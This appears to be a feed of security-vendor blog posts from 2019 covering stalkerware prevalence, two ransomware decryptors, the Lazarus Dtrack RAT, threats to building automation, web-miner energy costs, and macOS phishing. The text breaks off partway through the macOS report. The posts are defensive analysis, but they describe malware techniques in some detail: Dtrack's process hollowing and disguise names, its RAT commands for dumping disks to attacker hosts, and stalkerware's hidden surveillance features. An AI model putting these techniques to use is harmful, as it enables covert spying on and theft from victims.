  • From January to August 2019, around the world, there were more than 518,223 cases when our protection technologies either registered presence of stalkerware on users’ devices or detected an attempt to install it – a 373% increase in the same period in 2018
  • In the first eight months of 2019, 37,532 users encountered stalkerware at least once. This is a 35% increase from the same period in 2018 when 27,798 users were targeted
  • The number of users targeted by full-throttle spyware detected as Trojan-Spy reached 26,620 the first eight months of 2019, which makes it a minority compared to the number of users who encountered stalkerware
  • The Russian Federation remains the most prominent region for stalkerware globally, accounting for 25.6% of potentially affected users, in the first eight months of 2019. India is in second place with 10.6% of affected users, and Brazil is in third place (10.4%). The United States hold forth place with 7.1%
  • When it comes to Europe – Germany, Italy and the UK hold the top three places respectively
Rise of the stalkerware problem

This year has seen a sharp rise in the number of detections of stalkerware on Android devices protected by Kaspersky products. One reason for this rise could be the improvement in detecting stalkerware software through cybersecurity solutions. In April, Kaspersky launched functionality in its Android security app – Privacy Alert – that specifically alerts users if a software that can be used for stalking is found on their device. Since then, the number of detections has steadily risen. For instance, 4,315 users encountered stalkerware in March 2019, compared to 7,075 in April – a 64% increase in just one month. This figure rose to 9,251 during August, 94% higher than the month before the functionality was launched.

Fig.1 Number of users who encountered stalkerware in Jan-Aug 2019

These openly-sold consumer surveillance programs are often used for spying on colleagues, family members or partners, and are in great demand. For a relatively modest fee, sometimes as little as $7 per month, these apps stay hidden while keeping their operators informed about the device activity, such as its owner’s location, browser history, text messages, social media chats, and more. Some of them can even make video and voice recordings.

To further examine the extent of the stalkerware problem, Kaspersky has analyzed the last eight months’ worth of activity. Between January to August 2019, 37,533 users encountered stalkerware on their devices at least once. This is a 35% increase from the same period in 2018 when 27,798 users were targeted. Overall, there were 518,223 cases when Kaspersky products either registered the presence of stalkerware on users’ devices or detected an installation attempt in the period from January to August 2019 – a staggering 373% increase compared to the period in 2018.

Fig.2 Users targeted by stalkerware 2018 vs 2019

Examples of software used for stalking purposes

The most prolific stalkerware family in 2019 was identified as Monitor.AndroidOS.MobileTracker.a, which affected 6,559 unique users. In second place, Monitor.AndroidOS.Cerberus.a was detected on the devices of 4,370 users, closely followed in third place by Monitor.AndroidOS.Nidb.a (4,047).

Comparing the results from 2018, the top two differ from last year. Monitor.AndroidOS.Nidb.a and Monitor.AndroidOS.PhoneSpy.b were found most on the devices of users in 2018, reaching 4,427 and 2,819 respectively. Monitor.AndroidOS.XoloSale.a was the third most common stalkerware reaching 1,946 users.

In our internal classification system, a Monitor.AndroidOS.MobileTracker.a record is used to identify a Mobile Tracker Free application, which is positioned as a tool to track the activity of children or employees. In fact, the application allows tracking of the user’s location, their correspondence both in SMS messages and messenger applications (WhatsApp, Hangouts, Skype, Facebook Messenger, Viber, Telegram, etc.), as well as calls. A third-party can also access victims’ photos from the phone and the camera in real-time, along with their browser history, files on the device, calendar and contact list. In addition, the application provides the ability to remotely control the device. As well as all of this, there is a possibility of working in a hidden mode under the disguise of system applications.

Fig.3 Screenshots from the Mobile Tracker Free official website

The next application – Cerberus (Monitor.AndroidOS.Cerberus.a) – is positioned as an anti-theft app. However, it also allows a stalker to work in ‘hidden’ mode and to prevent its deletion. Among other things, it provides the ability to track the location of the device, take pictures from the camera and screenshots, as well as record audio from the microphone.

The third-placed Monitor.AndroidOS.Nidb.a is in fact a group of similar applications: iSpyoo/TheTruthSpy/Copy9. Unlike the previous two applications, some representatives of this group openly advertise themselves as a means of spying on a partner and even write articles about it.

Fig.4 Screenshot from the TheTruthSpy official website

The set of functions is quite standard for such programs yet still impressive – website tracing, interception of correspondence in SMS and in messenger applications, call tracing and browser history. Like many other similar applications, they require super-user rights (administration rights) to operate some functions. They can work in ‘hidden’ mode, and their names in the list of installed applications mimic the system processes.

Where is stalkerware found?

There is a global market for legal spyware and stalkerware software, as proven by the diverse range of regions where the most attacks are taking place. The top 10 countries with the largest share of users attacked with stalkerware do not have geopolitical similarities and are not in close proximity.

Fig. 5 Geography of users who encountered stalkerware in 2019

Kaspersky’s findings show that Russia is the region where stalkerware activity is peaking. Persistent activity in India has led to the country being the second most prominent region for stalkerware-related incidents from January to August, with 10.56% users affected.

Brazil accounted for 10.39% of attacked users in 2019, while the United States are now fourth (7.11%). There are advocacy groups in the country raising awareness about the dangers of stalkerware and conducting revealing user research. 72 domestic violence shelters were surveyed by National Public Radio, with 85% of domestic violence workers saying they have assisted victims whose abuser tracked them using GPS. Nearly three-quarters (71%) of domestic abusers monitor survivors’ computer activities, while 54% tracked survivors’ cell phones with stalkerware. The fifth most prevalent country in 2019 was Germany with (3.55%).

Stalkerware on the cyberthreat landscape

When comparing stalkerware and spyware to the rest of the attacks mobile users face – such as adware, riskware and malware – it takes up a big share of less targeted not-a-virus programs. In the first eight months of 2019, Kaspersky detected 2,350,862 users attacked with potentially unwanted threats and just 1.60% of them were related to stalkerware. However, unlike the majority of mass potential threats (like adware), stalkerware requires a specific stalker to act and carry out its operation. Every target is being stalked and chosen on purpose. So, while the numbers are lower, stalkerware takes a more targeted effort to affect a victim and has a disturbing figure of abuse behind each of them.

To get the big picture when assessing the stalkerware development dynamics, we’ve compared stalkerware to the full scale, illegal survelliance malware for PC that we detect as Trojan Spy. The results have proved, that while illegal spyware is in decline, stalkerware is thriving.

Fig. 6 Users attacked by stalkerware and spyware

Our analysis of the first eight months of 2019 shows that the number of users who encountered stalkerware had, in fact, surpassed the figure for Trojan-Spy attacks. While 2018 saw more than 43,000 spyware targets compared to around 28,000 stalkerware targets, in 2019 the picture changed. The number of users that encountered stalkerware grew by 35% to reach over 37,000, while spyware tools accounted for 26,620 of targets.

There has been a notable rise in the number of stalkerware-related incidents registered by Kaspersky products when compared to all threats from the figures in 2018. Between January and August last year, such software made up just 1.01% of the overall number of users who faced any kind of potentially dangerous (adware and others from not-a-virus category) software (2,740,023). It appears that stalkerware is growing in popularity, while more traditional malware attacks are less prolific than they were 12 months ago.

Conclusion and recommendations

It is clear to see that stalkerware is on the rise and becoming much more prominent in the cybersecurity landscape. In accordance with the overall number of detected riskware, adware and spyware attack fluctuations year-on-year, the percentage of stalkerware-related incidents continues to rise. It may take time to discover the role of stalkers on the cyberthreat landscape, but more incidents are now accounted for. Thanks to improved cybersecurity software, there has been a sharp rise since Kaspersky launched its own solution to notify users about stalkerware in April 2019.

There has also been a level of consistency around which countries are the most likely to experience stalkerware-related incidents, with Russia, India, the United States and Germany amongst the most prominent for the last two years.

The good news for users is that functionality and effective solutions are being put in place so they can protect themselves. Practical ways to solve the problem are coming to the fore. IT security companies and advocacy organizations working with domestic abuse victims should join forces to ensure that cybersecurity companies respond better to stalkerware. Such initiatives would help victims through technology and expertise.

We believe that every person has a right to be privacy-protected. That’s why we deliver security expertise, work closely with international organizations and law enforcement agencies to fight cybercriminals, as well as develop technologies, solutions and services that help you stay safe from the cyberthreats.

2019. szeptember 25.

Ransomware: two pieces of good news

“All your files have been encrypted.” How many times has this suddenly popped up on your screen? We hope never, because it’s one of the most common indicators that you’ve lost access to your files. And if there are no publicly available decryptors or you don’t have any backup copies, you’re in trouble.

Nowadays, cybercriminals have a thousand and one ways of creating and spreading ransomware. There are two common scenarios behind the creation of this kind of malware: in one, the criminals prefer to just reconfigure existing malicious source code; in the other, they choose to write their own ransomware, sometimes even using very specific languages.

However, don’t despair, because those fighting ransomware are not standing still either. In fact, we have two pieces of good news to share with you.

Good news #1

We’ve released a decryptor for the Yatron ransomware. The authors of the ransomware chose the first scenario mentioned above and based their ‘creation’ on the code used in Hidden Tear, a well-known sample of open-source ransomware. According to our statistics, during the last year alone our products have prevented more than 600 infections by various modifications of Trojan-Ransom.MSIL.Tear, with most attacks recorded in Germany, China, the Russian Federation, India and Myanmar.

Among the numerous modifications of Trojan-Ransom.MSIL.Tear, this one can be distinguished by the extension .Yatron that’s appended to encrypted files.

However, using third-party code without checking it raises the risk of critical vulnerabilities affecting the overall effectiveness of the program. That’s what happened here. Due to mistakes in the cryptographic scheme we were able to create a decryptor.

Good news #2

We’ve released a decryptor for the unique FortuneCrypt ransomware. To describe this malware, we could paraphrase Archimedes: give me a programming language, and I will write a ransomware program. The main feature of this ransomware is that it was compiled using a BlitzMax compiler. As Wikipedia states: “Being derived from BASIC, Blitz syntax was designed to be easy to pick up for beginners first learning to program. The languages are game-programming oriented but are often found general-purpose enough to be used for most types of application”. We’ve seen lots of ransomware written in C/C++, C#, Delphi, JS, Python, etc., but FortuneCrypt is the first ransomware we’ve seen that’s written in Blitz BASIC.

During the last year, our products registered more than 6,000 attacks carried out by the numerous variations of the malicious Trojan-Ransom.Win32.Crypren family (FortuneCrypt is part of this family). The top five countries attacked by the malware are: the Russian Federation, Brazil, Germany, South Korea and Iran.

The cryptor changes neither the file extension nor the file name; instead, it marks encrypted files by adding a text string to the beginning of an encrypted file.

The only indicator of infection visible to the victim is a ransom text that appears on the screen.

After some analysis, we found that the cryptographic scheme used by the malware is weak and the encrypted files can be easily recovered.


Both the decryptors mentioned here have been added to our RakhniDecryptor tool, which can be downloaded from the following sources:




Yatron ransomware

  • 7910B3F3A04644D12B8E656AA4934C59A4E3083A2A9C476BF752DC54192C255B


  • E2B9B48755BCA1EDFBA5140753E3AF83FB0AE724E36D8C83AB23E262196D1080
  • C26192E7B14991ED39D6586F8C88A86AF4467D5E296F75487BB62B920DEA533F
  • F2DCD2308C18FDB56A22B7DB44E60CDB9118043830E03DF02DAC34E4C4752587
2019. szeptember 23.

Hello! My name is Dtrack

Our investigation into the Dtrack RAT actually began with a different activity. In the late summer of 2018, we discovered ATMDtrack, a piece of banking malware targeting Indian banks. Further analysis showed that the malware was designed to be planted on the victim’s ATMs, where it could read and store the data of cards that were inserted into the machines. Naturally, we wanted to know more about that ATM malware, so we used YARA and Kaspersky Attribution Engine to uncover more interesting material: over 180 new malware samples of a spy tool that we now call Dtrack.

All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers—we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack memory dumps. After that, it got very interesting, because once we decrypted the final payload and used Kaspersky Attribution Engine again, we saw similarities with the DarkSeoul campaign, dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. According to our telemetry, the last activity of DTrack was detected in the beginning of September 2019.

Technical details

The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps. Its decryption routine, part of an executable physical patch, begins somewhere between the start() and WinMain() functions. A fun fact is that the malware authors embedded their malicious code into a binary that was a harmless executable. In some cases, it was the default Visual Studio MFC project, but it could be any other program.

The decrypted overlay data contains the following artifacts:

  • an extra executable;
  • process hollowing shellcode;
  • a list of predefined executable names, which the malware uses as a future process name.

After decryption of the data, the process hollowing code is started, taking the name of the process to be hollowed as an argument. The name comes from the predefined list found within the decrypted overlay. All the names come from the %SYSTEM32% folder, as you can see in the decrypted file list below.

  • fontview.exe
  • dwwin.exe
  • wextract.exe
  • runonce.exe
  • grpconv.exe
  • msiexec.exe
  • rasautou.exe
  • rasphone.exe
  • extrac32.exe
  • mobsync.exe
  • verclsid.exe
  • ctfmon.exe
  • charmap.exe
  • write.exe
  • sethc.exe
  • control.exe
  • presentationhost.exe
  • napstat.exe
  • systray.exe
  • mstsc.exe
  • cleanmgr.exe

What is inside the dropper?

After execution, the target of the process hollowing is suspended until its memory is overwritten with the decrypted executable payload from the dropper overlay. After this, the target process resumes.

The droppers contain a variety of executables, all of these intended for spying on the victim. Below is an incomplete functionality list for the various Dtrack payload executables found:

  • keylogging,
  • retrieving browser history,
  • gathering host IP addresses, information about available networks and active connections,
  • listing all running processes,
  • listing all files on all available disk volumes.

At this point, the design philosophy of the framework becomes a bit unclear. Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly.

Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc. For a full list of operations, see the table below.

command id description 1003 upload a file to the victim’s computer 1005 make target file persistent with auto execution on the victim’s host start 1006 download a file from the victim’s computer 1007 dump all disk volume data and upload it to a host controlled by criminals 1008 dump a chosen disk volume and upload it to a host controlled by criminals 1011 dump a chosen folder and upload it to a host controlled by criminals 1018 set a new interval timeout value between new command checks 1023 exit and remove the persistence and the binary itself default execute a process on the victim’s host Dtrack and ATMDTrack malware similarities

ATMDTrack is a subset of the DTrack family. They naturally look different despite their similarities. For example, Dtrack’s payload is encrypted within a dropper—unlike the ATMDTrack samples, which were not encrypted at all. But after decrypting the Dtrack payload, it becomes clear that the developers are the same group of people: both projects have the same style and use the same implemented functions. The most obvious function they have in common is the string manipulation function. It checks if there is a CCS_ substring at the beginning of the parameter string, cuts it out and returns a modified one. Otherwise, it uses the first byte as an XOR argument and returns a decrypted string.

Functions common to the two families (the functions/arguments were named by the researchers)


When we first discovered ATMDtrack, we thought we were just looking at another ATM malware family, because we see new ATM malware families appearing on a regular base. However, this case proved once again that it is important to write proper YARA rules and have a solid working attribution engine, because this way you can uncover connections with malware families that have appeared in the past. One of the most memorable examples of this was the WannaCry attribution case. Now we can add another family to the Lazarus group’s arsenal: ATMDtrack and Dtrack.

The vast amount of Dtrack samples that we were able to find shows that the Lazarus group is one of the most active APT groups in terms of malware development. They continue to develop malware at a fast pace and expand their operations. We first saw early samples of this malware family in 2013, when it hit Seoul. Now, six years later, we see them in India, attacking financial institutions and research centers. And once again, we see that this group uses similar tools to perform both financially-motivated and pure espionage attacks.

To succeed in spying, the criminals should be able to gain at least partial control over the internal network. This means that the target organizations may have a number of security issues, such as:

  • weak network security policies,
  • weak password policies,
  • lack of traffic monitoring.

We therefore advise the companies to:

  • tighten their network and password policies,
  • use traffic monitoring software, such as Kaspersky Anti Targeted Attack Platform (KATA),
  • use antivirus solutions.
  • 8f360227e7ee415ff509c2e443370e56
  • 3a3bad366916aa3198fd1f76f3c29f24
  • F84de0a584ae7e02fb0ffe679f96db8d
2019. szeptember 19.

Threat landscape for smart buildings

The Kaspersky Industrial Cybersecurity Conference 2019 takes place this week in Sochi, the seventh such conference dedicated to the problems of industrial cybersecurity. Among other things, the conference will address the security of automation systems in buildings — industrial versions of the now common smart home. Typically, such a system consists of various sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems, etc.; it also includes servers that manage the controllers, as well as computers of engineers and dispatchers. Such automation systems are used not only in office and residential buildings, but in hospitals, shopping malls, prisons, industrial production, public transport, and other places where large work and/or living areas need to be controlled.

We decided to study the live threats to building-based automation systems and to see what malware their owners encountered in the first six months of 2019.

Malware and target systems

According to KSN, in H1 2019 Kaspersky products blocked malicious objects on 37.8% of computers in building-based automation systems (from a random sample of more than 40,000 sources).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Share of smart building systems on which malware was blocked, 2018-2019 (download)

It should be mentioned right away that most of the blocked threats are neither targeted, nor specific to building-based automation systems. In other words, it is ordinary malware regularly found on corporate networks unrelated to automation systems. This does not mean, however, that such malware can be ignored — it has numerous side effects that can have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations as a result of malicious traffic and unstable exploits. Spyware and backdoors (botnet agents) pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a targeted attack on a building’s automation system.

What are the threats of a targeted attack? First off, there is disruption of the computers that control the automation systems, and subsequent failure of the systems themselves, since not all of them are totally autonomous. The result may be a disruption of the normal operation of the building: electricity, water, and ventilation are likely to continue to work as before, but there may be problems with opening/closing doors or using elevators. There may also be problems with the fire extinguishing system, for example, a false alarm or, worse, no signal in the event of a fire.

Geographical distribution of threats

Share of smart building systems on which malware was blocked, by country, H1 2019

Top 10 countries

Country %* Italy 48.5 Spain 47.6 Britain 44.4 Czech Republic 42.1 Romania 41.7 Belgium 38.5 Switzerland 36.8 India 36.8 China 36.0 Brazil 33.3

*Share of computers on which malware was blocked
Sources of threats to building-based automation systems

When studying the sources of threats to building-based automation systems, we decided to compare them with similar statistics on industrial systems that we regularly compile and publish. Here’s the result:

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Sources of threats to building-based automation systems by share of attacked computers, H1 2019 (download)

The graph shows that in building-based automation systems the share of attacked computers is consistently higher than in industrial systems. That being the case, the total share of attacked computers over the same period is greater in industrial systems (41.2%). This is due to the fact that building-based automation systems are more similar to systems in the IT segment — on the one hand, they are better protected than industrial ones, so the overall percentage is lower; on the other, they have a large attack surface (i.e. the majority have access to the Internet and often use corporate mail and removable drives), so each computer is exposed to more threats from different sources.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Types of malware detected in building-based automation systems, by share of users attacked, H1 2019 (download)

Note that it is not only the networks of automation systems in specific buildings (stations, airports, hospitals, etc.) that face threats. The networks of developers, integrators, and operators of such systems, who have (often privileged) remote access to a huge number and variety of objects, are also subjected to “random” and targeted attacks. Having gained access to computers in the network of an integrator or dispatcher, the cybercriminals can, theoretically, attack many remote objects simultaneously. At the same time, the remote connection to the automation object on the side of the integrator/operator is considered trusted and often effectively uncontrolled.

The threat landscape for smart buildings and how to minimize it will be discussed in more detail at the conference. One final note is to mention the importance of monitoring network communications on the perimeter and inside the network of automation systems. Even minimal monitoring will reveal current issues and violations, the elimination of which will significantly increase the object’s level of security.

2019. szeptember 17.

Assessing the impact of protection from web miners

Brief summary:

We present the results of evaluating the positive economic and environmental impact of blocking web miners with Kaspersky products. The total power saving can be calculated with known accuracy using the formula <w>·N, where <w> is the average value of the increase in power consumption of the user device during web mining, and N is the number of blocked attempts according to Kaspersky Security Network (KSN) data for 2018. This figure is equal to 18.8±11.8 gigawatts (GW), which is twice the average power consumption rate of all Bitcoin miners in that same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that user devices spend on web mining, that is, according to the formula <w>·N·t, where t is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to 200 thousand dollars for residents in North America or up to 250 thousand euros for residents in Europe.

So what’s our contribution to the fight against excess energy consumption?

Cryptocurrency mining is an energy-intensive business. According to some estimates, Bitcoin miners consume the same amount of energy as the Czech Republic, a country of more than 10 million people (around 67 terawatt hours per year). At the same time, as we already noted, they do this with multiple redundancy — but only as long as this is economically justified. But what about users that are forced to mine against their will — that is, systems affected by web miners (websites mining cryptocurrency)? Since this most often happens illicitly, such sites are detected by security solutions as malicious and blocked.

In 2018, Kaspersky products blocked 470 million attempts to download scripts and attempts to connect to mining resources on the computers and devices participating in Kaspersky Security Network. Is it possible to assess the economic (and environmental) impact of this undoubtedly positive activity? To answer this question, we had to tackle several issues.

1. How much does power consumption increase when the system is mining cryptocurrency?

We couldn’t find any open source data on this matter, since most researchers are interested in, so to speak, integral power consumption of cryptocurrency mining systems — that is, how much a particular hardware set up consumes in total and how much they’d spend to cover the electricity bill. Data on the most common mining systems can be found at the sites like miningbenchmark.net, which help to make an informed decision on economic viability and, accordingly, whether to mine or not to mine. We were interested in the question of what portion of a system’s total energy consumption is related specifically to web mining that happens without the user’s consent.

To get an answer, we used a measuring bench previously set up to study surges in mobile energy consumption during USB charging and data exchange.

Using the computers of 18 volunteers (a big thank-you to them once again), we were able to experimentally determine the rise in the power consumption of 21 different devices when mining Monero on CoinHive (the most common cryptocurrency mining service). In brief, here’s what we managed to figure out:

  • Is there a dependence on the type of processor? Definitely.
  • Is there a dependence on the amount and type of memory? Definitely not.

This is clear from this image showing the increase in CPU load when mining begins:

As can be seen, the amount of used memory used does not change and does not depend on the amount of processor load.

  • Is there a dependence on Internet connection speed? We did not check this; in all experiments the connection speed was more or less the same.
  • Is there a dependence on the browser? Definitely not.
  • Is there a dependence on the type of operating system? Probably not.

It’s worth explaining here that we lack sufficient data to draw a definite conclusion regarding the operating system. We saw slightly different results for the same hardware running under different operating systems (namely, Mac OS and Windows); the difference falls within the boundaries of statistical error, and there are too few points for a reliable conclusion.

For comparison, the processor load under Mac OS looked something like this:

The situation is identical to the CPU load under Windows, not exceeding 10–12% in idle mode, and 100% during web mining.

The graph showing the dependence of the measured increase in energy consumption on the processors’ nominal TDP (thermally dissipated power), taken from the manual, looks something like this:

The red line shows the result of a linear approximation in the ax + b form, where a = 1.013±0.017 and b = –0.237±0.044 (determined by the least squares method taking into account the measurement error at each point), as well as the range of values predicted by the model with 95% probability. There are slightly more outliers on this graph towards energy consumption exceeding TDP than those that energy consumption below TDP. Overall, however, for the purposes of further approximation, it is sufficient to use TDP as an estimate of the increase in energy consumption in web mining mode.

Question 2. But processors that are part of devices that block web miners have different TDPs. How to evaluate the contribution of each of them?

To analyze the distribution pattern of processors by TDP, we used a random sample containing about 1% of the total number of devices participating in KSN. In this sample, we managed to identify 2,497 CPU types. Reference data on 1,550 types of processors were pulled automatically by playing with regular expressions and scraping open sources, the most useful of which was PassMark CPU Benchmark. Information about the remaining 947 types of processors had to be added manually.

The weighted average TDP from this data was calculated as

where fi is the frequency of the i-th type of processor, and ni is the number of processors of the i-th type in the distribution of CPU’s TDP. However, the frequency distribution of CPU’s TDP is far from normal, so we will have to use a coarse estimate covering all TDP values from 15 to 65 W, that is, <w> = 40±25 W.

3. How to calculate the average working time of a web miner?

This is perhaps the most difficult question, since Kaspersky products are there to block web miners. A study by our colleagues from the Foundation for Research and Technology — Hellas (FORTH), a research center in Greece, gives an estimate of the average working time of web miners at 5.3 minutes. And a joint report by colleagues from the University of California, Santa Barbara, the University of Amsterdam, and the University of Utrecht estimates the average time that people spend on websites where web mining activity has been detected as approximately one minute.

At the time of writing this article, web analytics service SimilarWeb had calculated the average time of a visit to cnhv.co (a coinhive.com mirror) to be 46 seconds. As such, time is the most volatile parameter in our energy consumption formula Wtotal = <w>·N·t, where N is the number of detections and t is the time that the web miner would have been in operation had it not been blocked by our product. Substituting the corresponding values, we obtain an estimate of Wtotal: 240 to 1,670 megawatt hours (MWh). Being several orders of magnitude less than Bitcoin’s total energy consumption of 67 terawatt hours, this is still a serious amount of energy. It is comparable to the annual energy consumption of a city with a population of several hundred thousand.

Incidentally, the cost of the maximum amount of power that the miners we blocked could have consumed (1.67 GWh) varies around the world. If this amount of power were consumed entirely in Europe, European consumers would have to fork out €250,000, while for US residents the figure would be $200,000. The cheapest electricity of all would be available to residents of China and India, where negligence in the face of web miners would cost “only” $133,000. And in Japan, where electricity is the most expensive, that would cost half a million dollars.

As for the ecological impact, based on the IEA (International Energy Agency) global average value for carbon emission of 475 kg/MWh, we can assume that we have prevented the release from 115 to 800 tons of CO2 into the atmosphere.

As you can see, the confidence intervals that we have for energy estimates are quite wide. This is because we had to use the duration of time, which we could not estimate directly. If we remove it from equation, we get the “detection power” (<w>·N) – or the power consumption rate of all blocked attempts. For 470 million web mining attempts detected (and blocked) in 2018, this value is equal to 18.8±11.8 gigawatts (GW). To compare that with Bitcoin as a reference point, we can divide the known amount energy Bitcoin miners have consumed the same year by time – and we get roughly 7.647 GW, that is, half as much! Remember that the total power energy consumed Bitcoin miners was compared with electricity spent by residents of Czech Republic? Looking into IEA’s statistics for OECD countries, we found that 18.8 GW of power consumption rate is comparable to the power consumption rate (the amount of energy they consume within a unit of time) of such country as Poland, with almost three times as much residents as Czech Republic. We can also compare this with the infamous Chernobyl nuclear plant, whose four reactors before the accident produced around 4 GW of power in total. In other words, in one year Kaspersky products saved as much power as the output of four Chernobyl plants, or double the power consumption rate of all Bitcoin miners worldwide.


The ongoing fight against web mining has been quite successful, in both legal and technological aspects. However, as long as profit can be made, cyber criminals will find ways to utilize the CPUs of unsuspecting victims. For instance, we had no trouble finding the above-mentioned CoinHive mirror, and it’s not unlikely that owners of Coihhive and other web mining sites would continue their assaults on unsuspecting users in future as well — on the systems without information security solutions, of course.

The most effective constraint, in our view, is the situation on the cryptocurrency market as a whole: web miners will continue to exist as a threat as long as it remains possible to convert cryptoassets mined this way into fiat currency.

Which means that in order to make our foreseeable future greener, literally, security products would have to continue working for the good of their owners — and the entire world.

  1. We have been able to experimentally measure the dependence of increase in power consumption on nominal TPD for 21 types of processors, which amounts to 0.8% of the total number of processor types in the random sample of 1% CPUs in Kaspersky Security Network (2497 processor types). Given that, and also assuming that the list of CPU types evolves with time, we plan to study this matter in more detail going forward.
  2. The estimates above were made in the assumption that frequency distribution of CPU TDPs that were blocking web mining attempts, was similar to the frequency distribution of CPU TDPs determined from a random sampling of approximately 1% of the total number of devices participating in Kaspersky Security Network. This assumption may be incorrect, but there is no technical way of checking it, because Kaspersky Security Network operates only with depersonalized statistics and thus we cannot match data on processor types with data on detections.
2019. szeptember 11.

Threats to macOS users


The belief that there are no threats for the macOS operating system (or at least no serious threats) has been bandied about for decades. The owners of MacBooks and iMacs are only rivaled by Linux users in terms of the level of confidence in their own security, and we must admit that they are right to a certain degree: compared to Windows-based systems, there are far fewer threats that target macOS. However, the main reason for this is the number of potential victims: there are many more computers running Windows than those running macOS. However, the situation is changing, since the popularity of the latter platform is growing. Due to this and despite all the efforts that have been taken by the company, the threat landscape for Apple devices is changing, and the amount of malicious and unwanted software is growing.

For the purposes of this report we used the statistics from Kaspersky Security Network cloud infrastructure. It stores information about all of the malicious programs and other threats that our macOS product users agreed to anonymously share with us. In fact, all these threats at some point attacked the computers of Kaspersky security solution users, but these attacks were successfully repelled.

Figures and trends Phishing
  • During the first half of 2019, we detected nearly 6 million phishing attacks on macOS users. Of these, 11.80% targeted corporate users.
  • The countries with the largest share of unique macOS users who experienced phishing attacks were Brazil (30.87%), India (22.08%), and France (22.02%).
  • The number of phishing attacks that make use of the Apple brand name grows by 30–40% every year. In 2018, the number of such attacks approached 1.5 million. As of June, the number of phishing attacks in 2019 has already exceeded 1.6 million, which is an increase of 9% over the entire previous year.
Malicious and potentially unwanted software
  • From 2012 to 2017, the number of macOS users who have experienced attacks from malicious and potentially unwanted programs grew, approaching 255,000 attacked users per year. However, starting in 2018, the number of attacked users began to decrease, and in the first half of 2019 it only amounted to 87,000.
  • The number of attacks on macOS users through malicious and potentially unwanted programs has been increasing annually since 2012, and in 2018 it exceeded 4 million attacks. During the first half of 2019, we registered 1.8 million attacks of this kind.
  • The vast majority of threats for macOS in 2019 were in the AdWare category. As for the malware threats, the Shlayer family, which masquerades as Adobe Flash Player or an update for it, has been the most prevalent.
  • More than a quarter of Mac users who are protected by Kaspersky solutions and have experience malicious and potentially unwanted software attacks live in the USA.
Phishing for Mac users

We started collecting detailed statistics on phishing threats that target macOS users in 2015. The data that has been collected over the last four years suggests that the number of phishing attacks on macOS users is definitely growing, and quite rapidly at that. While in 2015 we registered a total of 852,293 attacks, in 2016 this figure grew by 86% to over 1.5 million, and in 2017 it skyrocketed to 4 million. In 2018, the number of attacks continued to grow, crossing the 7.3 million mark. At this point we can see that during the first half of 2019 alone, 5,932,195 attacks were committed, which means that the number of attacks may exceed 16 million by the end of the year if the current trend continues.

Growth in the number of phishing attacks on macOS users, 2015–2019

The share of corporate macOS users who faced phishing attacks during the first half of 2019 came up to 11.80%. This is a slight increase compared to the same period in 2018, when this category made up 10.25%.

The phishing page subject matters

In order to understand what services phishing pages impersonate, we analyzed the most common phishing tricks and the geography of attacked users. Then we compared the results with the data from the same period of 2018.

Both in 2019 and 2018, the phishing pages visited by MacOS users most often pretended to be banking services (39.95% in 2019 and 29.68% in 2018), the second popular being global Internet portals (21.31% in 2019 and 27.04% in 2018). Social networks came in third in 2019 (12.3%), taking up the online stores’ place (10.75% in 2018).

H1 2018 H1 2019 Banks 29.68% Banks 39.95% Global Internet portals 27.04% Global Internet portals 21.31% Online stores 10.75% Social networks 12.30% Payment systems 6.63% Payment systems 8.40% Telecommunications companies 5.22% Online stores 8.24% Social networks 5.06% Web services 4.70% Financial services 4.87% Telecommunications companies 2.06% Web services 4.16% IT companies 0.49% Messengers 1.19% Online games 0.44% Online games 1.06% Financial services 0.35% Other 4.35% Other 1.76%

Phishing pages by share of users, first halves of 2018 and 2019


The countries with the largest share of unique macOS product users facing phishing attacks during the first half of 2019 were Brazil (30.87%), India (22.09%), and France (22.02%). In 2018, the top three countries were the same as in 2019. The only difference was in the percentages of users who were attacked: Kaspersky solutions prevented attacks against one out of four Mac product users in Brazil (26.02%), against one out of five in France (20.86%) and 17.70% in India.

H1 2018 H1 2019 Country % of attacked users Country % of attacked users Brazil 26.02% Brazil 30.87% France 20.86% India 22.09% India 17.70% France 22.02% Spain 17.40% Spain 22.01% Hong Kong 15.65% Australia 20.08% Australia 15.14% Mexico 19.89% Great Britain 14.43% Italy 18.36% Mexico 13.53% Great Britain 18.11% Canada 13.49% Canada 18.06% Italy 13.11% Russia 17.25%

Geography of phishing attacks by share of users, first halves of 2018 and 2019

